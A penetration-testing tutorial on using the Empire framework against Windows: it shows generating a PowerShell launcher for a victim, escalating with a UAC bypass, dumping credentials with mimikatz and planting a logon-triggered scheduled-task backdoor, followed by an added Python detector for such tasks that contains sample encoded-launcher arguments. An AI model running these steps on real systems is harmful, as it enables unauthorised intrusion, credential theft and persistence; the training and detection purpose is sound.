[ Pen Testing Windows ] :: Penetration Testing Windows: Powershell/Empire


Powershell is the object-oriented replacement for the ancient Windows cmd.exe. It is not present on all installations of Windows, but can be added via a download from Microsoft.

There are five versions of Powershell at the moment (2018). You can start it by typing powershell in the runline or in cmd.

Before going any further, read this presentation:

And see this quick description with handy hints:


Empire lets you run Powershell agents without needing Powershell to be installed on your target.

Here’s a good intro:

You may need to install Empire:

git clone https://github.com/EmpireProject/Empire.git
cd Empire
chmod +x install.sh

Enter a password or let it generate one for you.


Create a listener

Start Empire:

# list listeners
# use the http listener
uselistener http
# now our listener should show up:

Create a PowerShell script and send it to your victim using the launcher

Create a launcher:


Generate a Powershell script with the listener name http:

launcher powershell http

Copy the resulting Powershell script.

Open a new terminal and start a remote desktop session: (this is noisy, so consider terminal alternatives)

rdesktop -u IEUser -p password

In the remote desktop, open a cmd shell and paste in the script. Hit Enter.

Back in the Linux Empire terminal session, see that there is now an agent active.

In this terminal go back to the main window:


List available agents:


Note the Name of the agent. It’s random and complex, so rename it:

rename [old name] [new name]

Now to list the active agents enter:


Interact with our agent:

interact http

Get info on the agent:


High_integrity 0 means we’re not an admin.

Become an admin, amazingly, with a single command, followed by the name of the listener:

bypassuac http

Now type:


Note the new listener and the user names listed. An asterisk indicates a power user. Rename this new listener too:

rename [old name] [new name]

Now let’s interact with the new agent:

interact [agent name]

High_integrity 1 now indicates we’re admin!

List all extracted passwords (there aren’t any yet):


Run mimikatz and wait for it to execute. Note that this may crash the LSASS process, making us very conspicuous. See another way to get AD information at https://schoolforhackers.com/penetration-testing-windows-active-directory-extracting-ntds-and-cracking-hashes/.


Once it’s done type:


and see the cracked passwords.

Create a persistent backdoor with the module schtasks:

usemodule persistence/elevated/schtasks
# check its options
# set
set OnLogon True
set Listener http
# exploit!

Now our backdoor will execute every time the user logs on.
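A defender-side counterpart to the Powershell launcher and the schtasks logon persistence above, added here as an example and not part of the original page or of Empire: it parses the task XML that Windows Security event 4698 (scheduled task created) carries in its TaskContent field and alerts when a logon-triggered task launches PowerShell with launcher-style switches. The two task documents are constructed samples, and the switch patterns are my assumptions about what such a launcher looks like.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples (not real event data): the task XML that Windows Security
# event 4698 ("a scheduled task was created") carries in its TaskContent field.
LOGON_PS_TASK = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NoP -NonI -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA</Arguments>
  </Exec></Actions>
</Task>"""
BENIGN_TASK = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2018-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\\Tools\\backup.exe</Command><Arguments>/nightly</Arguments></Exec></Actions>
</Task>"""

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumed launcher-style switches: encoded command, hidden window, no profile, non-interactive.
SUSPICIOUS = re.compile(
    r"-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}|-w(?:indowstyle)?\s+(?:1|hidden)\b|-nop\b|-noni\b",
    re.IGNORECASE,
)


def analyze_task(task_xml: str) -> dict:
    """Report whether a task fires at logon and which Exec actions look like a PowerShell launcher."""
    root = ET.fromstring(task_xml)
    logon = root.find("t:Triggers/t:LogonTrigger", NS) is not None
    hits = []
    for exe in root.findall("t:Actions/t:Exec", NS):
        cmd = exe.findtext("t:Command", default="", namespaces=NS)
        args = exe.findtext("t:Arguments", default="", namespaces=NS)
        if "powershell" in cmd.lower() and SUSPICIOUS.search(args):
            hits.append({"command": cmd, "switches": [m.group(0) for m in SUSPICIOUS.finditer(args)]})
    # Alert only on the combination the page describes: runs at logon AND launches PowerShell quietly.
    return {"logon_trigger": logon, "hits": hits, "alert": logon and bool(hits)}


if __name__ == "__main__":
    for name, xml in (("logon-powershell", LOGON_PS_TASK), ("benign", BENIGN_TASK)):
        print(name, analyze_task(xml))
```

Feeding real 4698 events through this means extracting the TaskContent field first; the OnLogon option used above is exactly what produces the LogonTrigger element this code keys on.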